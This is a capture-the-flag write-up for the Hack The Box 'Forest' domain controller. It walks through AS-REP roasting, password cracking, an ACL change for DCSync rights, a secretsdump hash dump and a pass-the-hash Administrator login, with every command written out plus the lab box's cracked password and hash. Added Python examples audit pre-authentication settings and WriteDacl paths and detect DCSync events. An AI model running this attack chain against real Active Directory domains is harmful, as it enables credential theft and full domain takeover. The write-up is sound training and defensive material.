Hack The Box - Forest Writeup

First Steps

The first step as with most other boxes is to run nmap on the box.


nmap -sC -sV -oA nmap -v


53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-25 11:09:14Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h46m50s, deviation: 4h37m10s, median: 6m48s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-02-25T03:11:35-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-02-25T11:11:31
|_  start_date: 2020-02-24T13:09:15

From this scan we can see that the target is a Windows box that looks like an Active Directory domain controller.


Given that this box is an AD domain controller, it is best to first add the domain to our local hosts file so that the htb.local name resolves correctly.


echo " htb.local" | sudo tee -a /etc/hosts


Using enum4linux we can find further information about the AD configuration on the server. From this scan we get a user list.

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

Stripping the extra data from each line gives us a user list file to pass to other tools.

ASREPRoast Attack

Using impacket and the user list we created, we can find any accounts that do not require Kerberos pre-authentication. The server returns a crackable hash for each such account we supply.


Using the Python script GetNPUsers.py, we pass the user list to the server and receive the hashes in the format of our choosing (john in this case), saved to the file named by -outputfile (Forest.hashes here).

sudo python3 GetNPUsers.py htb.local/ -usersfile /home/kali/Desktop/Forest/users.txt -format john -outputfile Forest.hashes



We can see that svc-alfresco is a valid username and has a crackable password.
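The condition being probed here is an attribute on the account itself: the userAccountControl bit DONT_REQUIRE_PREAUTH. An administrator can find such accounts from an LDAP export without sending any Kerberos traffic. The following is an added example (not code from the writeup or from impacket) that reduces the enum4linux output above to bare account names and then decodes a constructed LDIF-style userAccountControl export to report which enabled accounts have pre-authentication turned off; the account names and flag values in the sample data are constructed for the example.

```python
import re

# userAccountControl bit flags, as documented by Microsoft for the attribute.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

FLAG_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
}

# Constructed sample of enum4linux output, in the format shown in the writeup.
ENUM4LINUX_SAMPLE = """\
user:[Administrator] rid:[0x1f4]
user:[krbtgt] rid:[0x1f6]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
"""

# Constructed LDIF-style export, as ldapsearch prints it. Flag values are invented
# for the example; only svc-alfresco carries the DONT_REQUIRE_PREAUTH bit.
LDIF_SAMPLE = """\
dn: CN=Administrator,CN=Users,DC=htb,DC=local
sAMAccountName: Administrator
userAccountControl: 66048

dn: CN=krbtgt,CN=Users,DC=htb,DC=local
sAMAccountName: krbtgt
userAccountControl: 514

dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-alfresco
userAccountControl: 4260352

dn: CN=andy,CN=Users,DC=htb,DC=local
sAMAccountName: andy
userAccountControl: 512
"""

USER_LINE = re.compile(r"user:\[(?P<name>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-f]+)\]")


def parse_enum4linux_users(text):
    """Reduce enum4linux 'user:[name] rid:[0x..]' lines to bare account names."""
    return [m.group("name") for m in USER_LINE.finditer(text)]


def parse_ldif_uac(text):
    """Return {sAMAccountName: userAccountControl} from an LDIF-style export."""
    accounts, name, uac = {}, None, None
    for line in text.splitlines() + [""]:  # trailing "" flushes the last record
        line = line.strip()
        if not line:
            if name is not None and uac is not None:
                accounts[name] = uac
            name, uac = None, None
        elif line.startswith("sAMAccountName:"):
            name = line.split(":", 1)[1].strip()
        elif line.startswith("userAccountControl:"):
            uac = int(line.split(":", 1)[1].strip())
    return accounts


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value."""
    return [flag for bit, flag in FLAG_NAMES.items() if value & bit]


def preauth_disabled(accounts, include_disabled=False):
    """Accounts that do not require Kerberos pre-authentication.

    Disabled accounts cannot be used even without pre-authentication, so they are
    skipped unless include_disabled is set.
    """
    hits = []
    for name, uac in accounts.items():
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(name)
    return hits


if __name__ == "__main__":
    print("enumerated accounts:", parse_enum4linux_users(ENUM4LINUX_SAMPLE))
    accounts = parse_ldif_uac(LDIF_SAMPLE)
    for name in preauth_disabled(accounts):
        print(f"{name}: pre-authentication not required ({', '.join(decode_uac(accounts[name]))})")
```

The fix on the directory side is simply clearing that bit on the account (or, where an application genuinely needs it, giving the account a long random password so the returned AS-REP does not crack).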

Cracking with john

John is an offline password cracker that tries every word in a wordlist against a hash. Using the rockyou.txt wordlist against the Forest.hashes file we should be able to crack the hash.

sudo john Forest.hashes --wordlist=/usr/share/wordlists/rockyou.txt

John should quickly find the password s3rvice for the svc-alfresco user.

Logging in with Evil-WinRM

Since port 5985 (WinRM) is open, we can use Evil-WinRM to log in to the system and get shell access.

evil-winrm -i -u svc-alfresco -p s3rvice -s '/home/kali/Desktop/Forest/scripts/'

Having obtained shell access, navigating to the user's desktop reveals the user.txt file.



Privilege Escalation

Since this box is focused on Active Directory, it is worth checking whether the server has any configuration errors by using BloodHound to find a path to Domain Admin. To do this we need a few things first.

Download Bloodhound & SharpHound.ps1

Installing BloodHound on Kali Linux is as easy as running sudo apt-get install bloodhound. However, you will still need to download the SharpHound.ps1 PowerShell script, which can be acquired from the BloodHound GitHub repo.

If using another Linux Distribution follow the instructions on GitHub for installation.

Neo4j Setup

Before you can use BloodHound you must change the default password of the Neo4j database.

  • Run sudo neo4j console
  • Navigate to
  • Login with the Username:neo4j and the password:neo4j
  • Change the password when prompted.
  • Leave the neo4j service running in the background

Evil-WinRM Invoke-Bloodhound

Evil-WinRM allows uploading and executing PowerShell scripts on a remote system.

Looking back at the connection command for Evil-WinRM we can see the flag -s '/home/kali/Desktop/Forest/scripts/'. This flag defines the location of PowerShell scripts on your attacking machine; set it to wherever you have your SharpHound.ps1 file.

Going back to the Evil-WinRM session we logged into earlier, we can now load the SharpHound PowerShell script. Type SharpHound.ps1 and hit return; after a few seconds the script will be loaded into your session.

Running the Evil-WinRM menu command will show the now available Invoke-BloodHound command.

Invoke-BloodHound -CollectionMethod All

This creates a zip archive of JSON files ready to be ingested into BloodHound.

To download the zip file from Evil-WinRM, simply type download XXXXXXXXXXX.zip.


Now that we have our JSON files, and Neo4j and BloodHound installed, we can begin to analyse the AD configuration.

Open BloodHound by typing bloodhound on your local machine and log in with the same credentials you used for Neo4j.

Drag the downloaded zip file onto the BloodHound window.

Click on Queries and then Find Shortest Path to Domain Admins.

This shows a diagram in which the user svc-alfresco inherits rights through nested group membership that allow the user to modify the domain object's access control list via the WriteDacl permission.

Examining the WriteDacl permission shows how this can be exploited.
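The finding BloodHound surfaces here is a graph problem: a user is a member of a group, which is a member of another group, and one of those groups holds an access control entry on the domain object. The same check can be written directly over a membership table and a list of ACEs, which is how an auditor would confirm (or rule out) the path without the GUI. The following is an added example, not code from the writeup or from BloodHound; the group names, nesting and ACEs below are a constructed snapshot and do not claim to reproduce the box's real directory.

```python
from collections import deque

# Constructed directory snapshot (not the real box's structure).
# MEMBERS maps a group to its direct members; a member may itself be a group.
MEMBERS = {
    "Domain Admins": ["Administrator"],
    "Service Accounts": ["svc-alfresco"],
    "Privileged IT Accounts": ["Service Accounts"],
    "Exchange Windows Permissions": ["Privileged IT Accounts"],
}

# ACES lists (principal, right, target object) entries from the domain object's DACL.
ACES = [
    ("Domain Admins", "GenericAll", "HTB.LOCAL"),
    ("Exchange Windows Permissions", "WriteDacl", "HTB.LOCAL"),
]

# Rights on the domain object that let the holder rewrite its DACL or take ownership.
DANGEROUS_RIGHTS = {"WriteDacl", "WriteOwner", "GenericAll", "Owns"}


def effective_groups(principal, members=MEMBERS):
    """Return {group: membership path} for every group reachable through nesting."""
    parents = {}
    for group, direct in members.items():
        for member in direct:
            parents.setdefault(member, []).append(group)
    found = {}
    queue = deque([(principal, [principal])])
    while queue:  # breadth-first, so the recorded path is a shortest one
        node, path = queue.popleft()
        for group in parents.get(node, []):
            if group not in found:
                found[group] = path + [group]
                queue.append((group, path + [group]))
    return found


def domain_rights(principal, target="HTB.LOCAL", members=MEMBERS, aces=ACES):
    """Map each dangerous right `principal` holds on `target` to the path granting it."""
    holders = {principal: [principal]}
    holders.update(effective_groups(principal, members))
    rights = {}
    for who, right, obj in aces:
        if obj == target and right in DANGEROUS_RIGHTS and who in holders:
            rights[right] = holders[who]
    return rights


def audit(users, admins_group="Domain Admins"):
    """Users outside Domain Admins who can nevertheless rewrite the domain's ACL."""
    findings = {}
    for user in users:
        if admins_group in effective_groups(user):
            continue  # expected to hold these rights
        rights = domain_rights(user)
        if rights:
            findings[user] = rights
    return findings


if __name__ == "__main__":
    for user, rights in audit(["Administrator", "svc-alfresco", "andy"]).items():
        for right, path in rights.items():
            print(f"{user}: {right} on HTB.LOCAL via " + " -> ".join(path))
```

The remediation that follows from the finding is the one BloodHound's edge description implies: remove the unexpected principal from the nesting chain, or remove the WriteDacl ACE from the group that should never have held it on the domain head.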

DC Sync Privileges & ACLPwn

To grant DCSync permissions to the user we use the aclpwn tool to make the changes to the access control list.

aclpwn takes the BloodHound domain data from Neo4j and performs the escalation automatically.

aclpwn -f svc-alfresco -ft user -d htb.local -du neo4j -dp kali
  • -f svc-alfresco The user we are escalating
  • -ft user The type of what we are escalating
  • -d htb.local The domain we are connecting to
  • -du neo4j -dp kali The username and password of the neo4j database where the bloodhound information is saved.

The user svc-alfresco now has DCSync Privileges.

DCSync Attack & Secretsdump.py

Since our user now has DCSync privileges, we can extract password hashes from the domain using secretsdump.py from impacket.

python3 secretsdump.py SVC-ALFRESCO@

Enter the password and the script will dump the password hash of every user in the domain.


We now have the password hash 32693b11e6aa90eb43d32c72a07ceea6 for Administrator.
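Both steps just taken, the aclpwn change to the domain's ACL and the replication request made by secretsdump.py, leave records in the domain controller's Security log when directory service auditing is enabled: the ACL change as event 5136 on the domain object's nTSecurityDescriptor attribute, and the replication request as event 4662 whose Properties list the DS-Replication-Get-Changes control access rights. The following is an added example, not code from the writeup or from impacket, of detection logic over a few constructed events in the shape a SIEM would hand over after parsing the log; the account names and the non-replication GUID in the last event are constructed, while the replication right GUIDs and the domainDNS class GUID are the well-known values from the AD schema.

```python
import re

# Control access rights whose use in event 4662 characterises a DCSync-style request.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # domainDNS schema class

# Constructed sample events (account names invented for the example).
SAMPLE_EVENTS = [
    {   # normal DC-to-DC replication: the requester is the DC's machine account
        "EventID": 4662, "SubjectUserName": "FOREST$", "SubjectDomainName": "HTB",
        "ObjectType": "%{" + DOMAIN_DNS_CLASS + "}",
        "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{" + DOMAIN_DNS_CLASS + "}",
    },
    {   # the ACL change: a user account rewrites the domain head's security descriptor
        "EventID": 5136, "SubjectUserName": "svc-alfresco", "SubjectDomainName": "HTB",
        "ObjectClass": "domainDNS", "ObjectDN": "DC=htb,DC=local",
        "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674",
    },
    {   # replication requested by a user account rather than a domain controller
        "EventID": 4662, "SubjectUserName": "svc-alfresco", "SubjectDomainName": "HTB",
        "ObjectType": "%{" + DOMAIN_DNS_CLASS + "}",
        "Properties": "%%7688\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{" + DOMAIN_DNS_CLASS + "}",
    },
    {   # unrelated 4662: a read of some other property (GUID constructed)
        "EventID": 4662, "SubjectUserName": "andy", "SubjectDomainName": "HTB",
        "ObjectType": "%{00000000-1111-2222-3333-444444444444}",
        "Properties": "%%7688\n\t{00000000-1111-2222-3333-555555555555}",
    },
]

GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)


def replication_rights_used(properties):
    """Names of replication rights referenced in a 4662 Properties field."""
    return [REPLICATION_GUIDS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_GUIDS]


def check_event(event, dc_accounts=frozenset({"FOREST$"})):
    """Return an alert dict for a suspicious event, or None.

    dc_accounts is the allow-list of machine accounts that legitimately replicate;
    an explicit list is safer than excluding every name ending in '$'.
    """
    account = f"{event.get('SubjectDomainName', '')}\\{event.get('SubjectUserName', '')}"
    if event.get("EventID") == 4662:
        used = replication_rights_used(event.get("Properties", ""))
        if used and event.get("SubjectUserName") not in dc_accounts:
            return {"rule": "replication-request-by-non-dc", "account": account, "rights": used}
    elif event.get("EventID") == 5136:
        if (event.get("ObjectClass") == "domainDNS"
                and event.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"):
            return {"rule": "domain-dacl-modified", "account": account,
                    "object": event.get("ObjectDN")}
    return None


def scan(events, **kwargs):
    """Run check_event over a batch and keep the alerts, in log order."""
    return [alert for alert in (check_event(e, **kwargs) for e in events) if alert]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The 5136 alert is the earlier and rarer signal: the domain head's security descriptor changes very seldom in a healthy domain, so any write to it by a non-administrative account is worth an immediate look, whereas 4662 replication events are noisy and need the domain controller allow-list to stay useful.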

Using Evil-WinRM the hash can be passed (pass-the-hash) to log in as Administrator and obtain full system access.


evil-winrm -i -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6

We now have full Administrator privileges on the system. Navigating to the Administrator's desktop we find the root.txt file.